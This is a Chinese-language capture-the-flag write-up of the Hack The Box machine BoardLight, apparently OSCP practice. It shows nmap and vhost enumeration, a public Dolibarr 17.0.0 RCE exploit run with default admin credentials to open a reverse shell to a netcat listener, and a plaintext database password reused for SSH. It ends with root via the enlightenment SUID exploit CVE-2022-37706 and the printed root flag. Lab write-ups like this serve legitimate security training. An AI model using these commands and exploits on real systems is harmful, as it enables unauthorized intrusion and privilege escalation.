OSCP - HTB - BoardLight
主要知识点
- vhost爆破
- 明文密码搜索
- SUID提权
具体步骤
信息收集
nmap扫描
UDP端口是filter掉的,而TCP端口也只是22,和80,比较直观
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 18:31 EDT
Nmap scan report for 10.10.11.11
Host is up (0.31s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 567.91 ms 10.10.16.1
2 568.20 ms 10.10.11.11
观察页面
在80端口开放的页面最下方发现了一个host, board.htb
编辑 /etc/hosts文件将boaard.htb与ip绑定
VHOST爆破
这里会爆破出一个crm.board.htb子域名
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://board.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: crm.board.htb Status: 200 [Size: 6360]
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================
再次观察页面
Dolibarr 17.0.0版本
打破边界
搜索Dolibarr 17.0.0相关的信息,发现了 默认密码为admin/admin,而RCE 的poc为https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253
在本地执行nc -nlvp 80后再执行poc即可实现reverse shell
┌──(kali㉿kali)-[~/Documents/htb/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253-main]
└─$ python exploit.py http://crm.board.htb admin admin 10.10.16.18 80
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
......
......
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.16.18] from (UNKNOWN) [10.10.11.11] 35874
bash: cannot set terminal process group (867): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
权限提升
获取第一个flag
寻找密码
这时查看一下home目录,发现了larissa用户
这时先搜索一下80端口的目录,在conf.php中发现了一个密码
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
......
......
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
......
......
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/conf
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$
切换用户
quick win一下,尝试用larissa/serverfun2$2023!! 来登录ssh,发现成功了,这时也可以获取第一个flag
└─$ ssh larissa@10.10.11.11
larissa@10.10.11.11's password:
Last login: Tue Apr 1 20:13:59 2025 from 10.10.16.18
larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$
获取第二个flag
这个enlightenment_xxx的文件具有SUID,但是目前我不知道它是干什么的
larissa@boardlight:~$ find / -type f -perm -4000 2>/dev/null
......
......
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
......
......
/usr/bin/vmware-user-suid-wrapper
在linpeas.sh的结果中发现了更多的关于enlightenment的信息,存在CVE-2022-37706漏洞,exp为
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 2024 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys ---> Before_0.25.4_(CVE-2022-37706)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd ---> Before_0.25.4_(CVE-2022-37706)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight ---> Before_0.25.4_(CVE-2022-37706)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
执行exp便可成功提权
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# cat /root/proof.txt
cat: /root/proof.txt: No such file or directory
# cat /root/root.txt
7cdb7cc19f7b1c6652a2d21a91495fbb
# exit
